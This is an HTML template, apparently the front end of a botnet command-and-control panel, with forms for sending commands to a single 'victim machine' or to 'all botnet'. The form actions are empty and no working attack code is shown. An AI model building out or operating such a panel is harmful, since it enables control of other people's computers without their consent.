<app-menu></app-menu>
<h2>EXECUTE COMMANDS IN VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">COMMANDs to execute in Victim Machine. You can launch several commands using '&' parameter.</p>
  <p><input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>EXECUTE COMMANDS IN ALL BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">COMMANDs to execute in Victim Machine. You can launch several commands using '&' parameter.</p>
  <p><input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
